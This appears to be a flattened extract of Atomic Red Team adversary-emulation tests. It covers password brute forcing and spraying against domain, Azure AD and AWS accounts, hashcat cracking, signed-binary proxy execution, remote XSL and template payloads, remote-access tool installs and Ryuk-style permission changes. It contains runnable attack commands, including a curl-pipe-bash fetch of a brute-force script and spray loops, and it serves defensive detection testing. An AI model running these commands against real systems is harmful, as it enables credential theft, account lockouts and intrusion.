Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, and then deletes the user.
Prereq: Check if running on a Redhat based machine.
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
userdel -fr art
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - FreeBSD
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
su art
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh | bash
Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudoers privileges, but they do not know the user's password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes sudo_bruteforce.sh, which brute-force guesses the password, and then deletes the user.
Prereq: Check if running on a FreeBSD based machine.
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi
Description: An adversary may attempt to brute force the password of a privileged account for privilege escalation.
In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
Prereq: The plink executable must be found in the ExternalPayloads folder.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1110.002 - Brute Force: Password Cracking
Password Cracking with Hashcat
cd ..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe\..
..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule T1110.002\src\sam.txt T1110.002\src\password.lst
Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
Prereq: Hashcat must exist on disk at specified location (..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe)
del "..\ExternalPayloads\hashcat6.7z" >nul 2>&1
del "..\ExternalPayloads\7z1900.exe" >nul 2>&1
del "..\ExternalPayloads\7z" /Q /S >nul 2>&1
del "..\ExternalPayloads\hashcat-unzip" /Q /S >nul 2>&1
T1110.003 - Brute Force: Password Spraying
Password Spray all Domain Users
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "Spring2020" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\IPC$ > NUL
Description: CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
Prereq: List of domain users to password spray must exist at %temp%\users.txt
Description: Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain.
https://github.com/dafthack/DomainPasswordSpray
T1110.003 - Brute Force: Password Spraying
Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {
  Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
  exit 1
}
  $credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
  try {
    Write-Host " [-] Attempting ${password} on account ${user}."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of password spraying"
Description: Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
T1110.003 - Brute Force: Password Spraying
Password spray all Azure AD users with a single password
$Users | Foreach-Object {
  $user = $_.UserPrincipalName
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
  try {
    Write-Host " [-] Attempting P@ssw0rd! on account ${user}."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:P@ssw0rd! are valid credentials!`r`n"
    Disconnect-AzureAD > $null
  } catch {
    Write-Host " [-] ${user}:P@ssw0rd! invalid credentials.`r`n"
  }
}
Write-Host "End of password spraying"
Description: Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
Valid credentials are only needed to fetch the list of Azure AD users.
Description: DomainPasswordSpray Attacks technique via function of WinPwn
T1110.003 - Brute Force: Password Spraying
Password Spray Invoke-DomainPasswordSpray Light
function Invoke-dpsLight ($Password, $userlist) {
  $users = Get-Content $userlist
  $Domain = "LDAP://" + ([ADSI]"").distinguishedName
  foreach ($User in $users) {
    $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
    if ($Domain_check.name -ne $null) {
      Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
    } else {
      Write-Host ". " -NoNewline
    }
  }
  Write-Host -ForegroundColor green "Finished"
}
Invoke-dpsLight "Spring2020" $env:Temp\usersdpsLight.txt
Description: Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray)
but without all the extra code that makes the script get blocked by many AVs.
This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
Prereq: Username file must exist at $env:Temp\usersdpsLight.txt
if (Test-Path $env:Temp\usersdpsLight.txt) {exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)
Description: This test attempts to brute force a list of Microsoft Online (Azure/O365) users with a single password via the MSOLSpray Powershell module.
Prereq: MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\MSOLSpray.ps1"){exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
Password Spray using Kerbrute Tool
cd "..\ExternalPayloads"
.\kerbrute.exe passwordspray --dc $ENV:userdnsdomain -d $ENV:userdomain "..\ExternalPayloads\passwordspray.txt" password132
Description: Test a single password against a list of users
Prereq: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Prereq: passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\passwordspray.txt"){exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
AWS - Password Spray an AWS using GoAWSConsoleSpray
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a XXXXXXXX -u T1110.003/src/aws_users.txt -p T1110.003/src/aws_passwords.txt
Description: GoAWSConsoleSpray is a tool built by WhiteOakSecurity that can be used to spray AWS IAM Console credentials in order to identify a valid login for a user account. For more details regarding the tool, check https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
Description: Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
Description: Modify the Local Machine registry RUN key to change the Windows Defender executable that should be run on startup. This should only be possible when
CMD is run with administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
Description: Sets a registry key that will tell Windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
Description: Sets a registry key using PowerShell that will tell Windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
Description: Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as C2 over Office 365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
Description: Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
Prereq: The DLL must exist on disk at specified location (T1218.007\bin\MSIRunner.dll)
if (Test-Path "T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}
T1218.007 - Signed Binary Proxy Execution: Msiexec
Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Description: Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
Prereq: The DLL must exist on disk at specified location (T1218.007\bin\MSIRunner.dll)
if (Test-Path "T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}
T1218.007 - Signed Binary Proxy Execution: Msiexec
Description: Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
T1218.008 - Signed Binary Proxy Execution: Odbcconf
Description: Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
along with other information about the assembly being installed.
Prereq: The CSharp source file must exist on disk at specified location (T1218.009\src\T1218.009.cs)
if (Test-Path "T1218.009\src\T1218.009.cs") {exit 0} else {exit 1}
Description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by Windows Defender; disable
Windows Defender real-time protection to fix it. Upon execution, calc.exe will be launched.
T1218.010 - Signed Binary Proxy Execution: Regsvr32
Description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
Prereq: AllTheThingsx86.dll must exist on disk at specified location (T1218.010\bin\AllTheThingsx86.dll)
if (Test-Path "T1218.010\bin\AllTheThingsx86.dll") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute JavaScript Remote Payload With GetObject
Description: Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)
Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed.
Cleanup:
taskkill /IM notepad.exe /f
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn: http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched.
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute VBscript command using Ordinal number
Description: Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn: http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched.
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with advpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
Upon execution calc.exe will be launched.
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011.inf")
if (Test-Path "T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011.inf")
if (Test-Path "T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011_DefaultInstall.inf")
if (Test-Path "T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a window saying "installation failed" will be opened.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011_DefaultInstall.inf")
if (Test-Path "T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Execution of HTA and VBS Files using Rundll32 and URL.dll
Description: IcedID uses this TTP as follows:
rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
Trickbot uses this TTP as follows:
rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs
In this atomic, the sample HTA file opens the calculator and the VBS file shows a message dialog with "rundll32 spawned wscript".
T1218.011 - Signed Binary Proxy Execution: Rundll32
Launches an executable using Rundll32 and pcwutl.dll
Description: Rundll32.exe loading an executable renamed as .scr using desk.cpl
Reference:
- [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
SIGMA rules:
- [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
- [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
Cleanup:
del not_an_scr.scr
T1218.011 - Signed Binary Proxy Execution: Rundll32
Running DLL with .init extension and function
rundll32.exe T1218.011\bin\_WT.init,krnl
Description: This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
DLL created with the AtomicTestHarnesses Portable Executable Builder script.
Prereq: The DLL file to be called must exist at the specified location (T1218.011\bin\_WT.init)
if (Test-Path "T1218.011\bin\_WT.init") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute command via FileProtocolHandler
rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
Upon execution, calc.exe will be launched.
This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload (calc.exe) by calling RouteTheCall. Upon execution, calc.exe will be launched.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
Description: Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
Prereq: INF file must exist on disk at specified location (T1218\src\Infdefaultinstall.inf)
if (Test-Path "T1218\src\Infdefaultinstall.inf") {exit 0} else {exit 1}
T1218 - Signed Binary Proxy Execution
ProtocolHandler.exe Downloaded a Suspicious File
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"
Description: Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.
Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.
The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.
Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Prereq: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
Description: Emulates an attack with DiskShadow.exe (a LOLBIN installed by default on Windows) being used to execute arbitrary commands.
Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Prereq: txt file must exist on disk at specified location (T1218\src\T1218.txt)
if (Test-Path "T1218\src\T1218.txt") {exit 0} else {exit 1}
Prereq: DiskShadow.exe must exist on disk at specified location (C:\Windows\System32\diskshadow.exe)
if (Test-Path C:\Windows\System32\diskshadow.exe) {exit 0} else {exit 1}
T1218 - Signed Binary Proxy Execution
Load Arbitrary DLL via Wuauclt (Windows Update Client)
Description: This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched.
See https://dtm.uk/wuauclt/
Prereq: DLL to load must exist on disk at the specified location (T1218\bin\calc.dll)
if (test-path "T1218\bin\calc.dll"){exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe > nul 2>&1
T1218 - Signed Binary Proxy Execution
Lolbin Gpscript logon option
Gpscript /logon
Description: Executes logon scripts configured in Group Policy.
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
T1218 - Signed Binary Proxy Execution
Lolbin Gpscript startup option
Gpscript /startup
Description: Executes startup scripts configured in Group Policy
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Description: Executes commands from a specially prepared ie4uinit.inf file.
PoC from: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
Prereq: ieuinit.inf must exist on disk at specified location (T1218\src\ieuinit.inf)
if (Test-Path "T1218\src\ieuinit.inf") {exit 0} else {exit 1}
Cleanup:
del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1
Description: This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
Upon execution, customshellhost.exe will spawn calc.exe.
Note this will only work on Windows 10 or 11.
[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
Cleanup:
Remove-Item -Path C:\test -Recurse -Force
T1218 - Signed Binary Proxy Execution
Provlaunch.exe Executes Arbitrary Command via Registry Key
Description: Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
Description: Executes a process under a trusted Microsoft-signed binary, msedge. This test will spawn "calc.exe" as a child process of msedge.exe.
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
Description: An adversary may attempt to trick the user into downloading TeamViewer and using it to maintain access to the machine. The TeamViewer installer will be at the destination location when successfully executed.
Description: An adversary may attempt to trick the user into downloading AnyDesk and using it to establish C2. The AnyDesk installer will be at the destination location and run when successfully executed.
Description: An adversary may attempt to trick the user into downloading LogMeIn and using it to establish C2. The LogMeIn installer will be at the destination location and run when successfully executed.
Description: An adversary may attempt to trick the user into downloading GoToAssist and using it to establish C2. The GoToAssist installer will be at the destination location and run when successfully executed.
Cleanup:
try{& "$T1219/bin/GoToCleanup.ps1"} catch{}
T1219 - Remote Access Software
ScreenConnect Application Download and Install on Windows
Description: An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. The ScreenConnect installer will be in the Downloads directory.
Msiexec will be used to quietly install ScreenConnect.
Description: An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel.
Upon successful execution, Ammyy Admin will be executed.
Prereq: Ammyy Admin must exist on disk at the specified location (..\ExternalPayloads\ammyy.exe)
if (Test-Path "..\ExternalPayloads\ammyy.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading RemotePC Software for use as a C2 channel.
Upon successful execution, RemotePC will be executed.
Prereq: RemotePC must exist on disk at the specified location (..\ExternalPayloads\RemotePC.exe)
if (Test-Path "..\ExternalPayloads\RemotePC.exe") {exit 0} else {exit 1}
Description: A recent trend among threat actors is, once a foothold is established, to maintain long-term persistence using third-party remote services such as NetSupport, which provide the operator with access to the network through legitimate services.
Prereq: NetSupport must be downloaded and exist on the disk at the specified location. (..\ExternalPayloads\T1219_NetSupport.exe)
if (Test-Path "..\ExternalPayloads\T1219_NetSupport.exe") {exit 0} else {exit 1}
Description: A recent trend among threat actors is, once a foothold is established, to maintain long-term persistence using third-party remote services such as UltraViewer, which provide the operator with access to the network through legitimate services.
Prereq: Ultraviewer installer must be downloaded and exist on the disk at the specified location. (..\ExternalPayloads\T1219_UltraViewer.exe)
if (Test-Path "..\ExternalPayloads\T1219_UltraViewer.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading UltraVNC for use as a C2 channel.
Upon successful execution, UltraVNC will be executed.
Prereq: UltraVNC must exist at ("$env:ProgramFiles\uvnc bvba\UltraVnc\vncviewer.exe")
if (Test-Path "$env:ProgramFiles\uvnc bvba\UltraVnc\vncviewer.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading MSP360 Connect for use as a C2 channel.
Upon successful execution, MSP360 Connect will be executed.
Prereq: MSP360 must exist at ($env:ProgramFiles\Connect\Connect.exe)
if (Test-Path $env:ProgramFiles\Connect\Connect.exe) {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine.
Download of RustDesk installer will be at the destination location when successfully executed.
Start-Process "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe"
Description: An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
Prereq: Splashtop must exist at "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe"
if (Test-Path "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to use Splashtop Streamer to gain unattended remote interactive access. Upon successful execution, Splashtop streamer will be executed.
Prereq: Splashtop Streamer must be installed in the location
Description: Executes the code specified within an XSL script tag during XSL transformation using a local payload.
Requires download of MSXSL, which is no longer available from Microsoft.
(Available via the Internet Archive: https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Opens Calculator.exe when the test executes successfully with AV turned off.
Prereq: XML file must exist on disk at specified location (T1220\src\msxslxmlfile.xml)
if (Test-Path "T1220\src\msxslxmlfile.xml") {exit 0} else {exit 1}
Prereq: XSL file must exist on disk at specified location (T1220\src\msxslscript.xsl)
if (Test-Path "T1220\src\msxslscript.xsl") {exit 0} else {exit 1}
Prereq: msxsl.exe must exist on disk at specified location (..\ExternalPayloads\msxsl.exe)
if (Test-Path "..\ExternalPayloads\msxsl.exe") {exit 0} else {exit 1}
Description: Executes the code specified within an XSL script tag during XSL transformation using a remote payload.
Requires download of MSXSL.exe, which is no longer available from Microsoft.
(Available via the Internet Archive: https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Opens Calculator.exe when the test executes successfully with AV turned off.
Prereq: msxsl.exe must exist on disk at specified location ("..\ExternalPayloads\msxsl.exe")
if (Test-Path "..\ExternalPayloads\msxsl.exe") {exit 0} else {exit 1}
Cleanup:
del -Path ..\ExternalPayloads\msxsl.exe >nul 2>&1
T1220 - XSL Script Processing
WMIC bypass using local XSL file
wmic process list /FORMAT:"T1220\src\wmicscript.xsl"
Description: Executes the code specified within an XSL script using a local payload.
Prereq: XSL file must exist on disk at specified location (T1220\src\wmicscript.xsl)
if (Test-Path "T1220\src\wmicscript.xsl") {exit 0} else {exit 1}
T1220 - XSL Script Processing
WMIC bypass using remote XSL file
wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
Description: Executes the code specified within an XSL script using a remote payload. Opens Calculator.exe when the test executes successfully with AV turned off.
T1221 - Template Injection
WINWORD Remote Template Injection
start "T1221\src\Calculator.docx"
Description: Opens a .docx file that loads a remote macro-enabled .dotm template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
Executes the code specified within the .dotm template.
Requires WINWORD, found in Microsoft Office: https://www.microsoft.com/en-us/download/office.aspx.
The default document opens Calculator.exe when the test executes successfully with AV turned off.
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Take ownership using takeown utility
takeown.exe /f %temp%\T1222.001_takeown_folder /r
Description: Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will
be displayed for the folder and each file inside of it.
Prereq: Test requires a file to take ownership of to be located at (%temp%\T1222.001_takeown_folder)
Description: Modifies the filesystem permissions of the specified folder and its contents to allow the specified user or group Full Control. If "Access is denied"
is displayed, it may be because the file or folder doesn't exist. Run the prereq command to create it. Upon successful execution, "Successfully processed 3 files"
will be displayed.
Prereq: Test requires a file to modify to be located at (%temp%\T1222.001_cacls)
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
attrib - Remove read-only attribute
attrib.exe -r %temp%\T1222.001_attrib\*.* /s
Description: Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed.
Open the file in File Explorer > Right Click > Properties and observe that the Read Only checkbox is empty.
Prereq: Test requires a file to modify to be located at (%temp%\T1222.001_attrib)
Description: Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folders as hidden by using specific flags so that
the victim does not see the file.
Cleanup:
del /A:H %temp%\T1222.001_attrib_2\T1222.001_attrib*.txt >nul 2>&1
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Grant Full Access to folder for Everyone - Ryuk Ransomware Style
Description: Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone.
**icacls "C:\*" /grant Everyone:F /T /C /Q**
However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host.
You can set your own path variable to "C:\*" if you prefer.
Prereq: Backup of original folder permissions should exist (for use in cleanup commands)
